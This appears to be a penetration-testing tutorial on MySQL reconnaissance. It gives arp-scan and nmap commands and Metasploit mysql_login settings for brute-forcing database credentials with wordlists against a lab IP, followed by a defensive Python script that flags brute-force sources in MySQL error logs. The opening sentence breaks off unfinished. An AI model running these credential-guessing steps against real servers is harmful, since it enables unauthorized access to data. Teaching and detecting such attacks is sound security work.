MySQL is not the only free database management system, nor is it the only open source one. One of the largest differences is the user friendliness that pervades MySQL. The friendliness, starting with the cost – free unless embedded in another product
Databases are a key target for cyber criminals because they store valuable information and suffer from a number of loopholes, including deployment failures, broken databases, data leaks, stolen database backups, lack of segregation, SQL injection and database inconsistencies. Any information about a database is advantageous to an attacker planning an attack. Whether it concerns the version of the database or its structure, it can yield further information with which to plan a strategy. If the version of the database is outdated, it can be easily attacked by finding a suitable exploit. Moreover, weak credentials on less secure databases can be reused or brute-forced to compromise a highly secured database. Lastly, knowledge of the database schema is vital to perform an SQL injection attack.
Step 1– #arp-scan -lo (arp-scan sends ARP packets to hosts on the local network and displays any responses that are received. The network interface to use can be specified with the --interface option. If this option is not present, arp-scan will search the system interface list for the lowest numbered, configured up interface.)
Step 2– The major step of reconnaissance is scanning the target, to determine whether the MySQL database is running on the victim's machine. The scan shows that MySQL is running on the target and the port is open.
#nmap 192.168.6.136
Step 3– Execute Metasploit framework by typing msfconsole on the Kali prompt.
#msfconsole -q
Step 4– >use auxiliary/scanner/mysql/mysql_login (to crack some valid MySQL credentials. We can use the mysql_login module in combination with our wordlists in order to discover at least one valid database account that will allow us to log in to the MySQL database)
Type show options to see the current settings of this module. >show options
Step 5– >set rhosts 192.168.6.136 (insert the remote IP address)
>set USER_FILE /root/Desktop/root.txt
>set PASS_FILE /root/Desktop/passwd.txt
>run (execute it with the run command.)
We will get the result.
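As an added example (not part of the original walkthrough or of Metasploit), the login guessing from Steps 4 and 5 can be spotted on the server side by counting `Access denied` entries per source host in the MySQL error log. The script assumes the server writes those notes to its error log (log_error_verbosity=3); the sample lines, hosts, thresholds and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the MySQL error-log format (assumes the
# server runs with log_error_verbosity=3); hosts and users are made up.
SAMPLE_LOG = """\
2024-05-01T10:00:01.100000Z 11 [Note] Access denied for user 'root'@'192.168.6.130' (using password: YES)
2024-05-01T10:00:01.400000Z 12 [Note] Access denied for user 'root'@'192.168.6.130' (using password: YES)
2024-05-01T10:00:02.000000Z 13 [Note] Access denied for user 'admin'@'192.168.6.130' (using password: YES)
2024-05-01T10:00:02.300000Z 14 [Note] Access denied for user 'mysql'@'192.168.6.130' (using password: YES)
2024-05-01T10:00:02.900000Z 15 [Note] Access denied for user 'backup'@'192.168.6.130' (using password: YES)
2024-05-01T10:07:00.000000Z 16 [Note] Access denied for user 'app'@'192.168.6.20' (using password: YES)
2024-05-01T11:30:00.000000Z 17 [Note] Access denied for user 'app'@'192.168.6.20' (using password: YES)
"""

DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d)\.\d+Z .*"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'")

def failed_logins(log_text):
    """Yield (timestamp, host, user) for each 'Access denied' line."""
    for line in log_text.splitlines():
        m = DENIED.search(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
            yield ts, m["host"], m["user"]

def brute_force_sources(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {host: sorted usernames tried} for every source with at least
    `threshold` failures inside any sliding `window`."""
    by_host = defaultdict(list)
    for ts, host, user in failed_logins(log_text):
        by_host[host].append((ts, user))
    flagged = {}
    for host, events in by_host.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[host] = sorted({u for _, u in events})
                break
    return flagged

if __name__ == "__main__":
    for host, users in brute_force_sources(SAMPLE_LOG).items():
        print(f"possible brute force from {host}: users tried {users}")
```

The second source in the sample fails twice, more than an hour apart, so it stays below the threshold, which is the difference between a misconfigured client and a wordlist run.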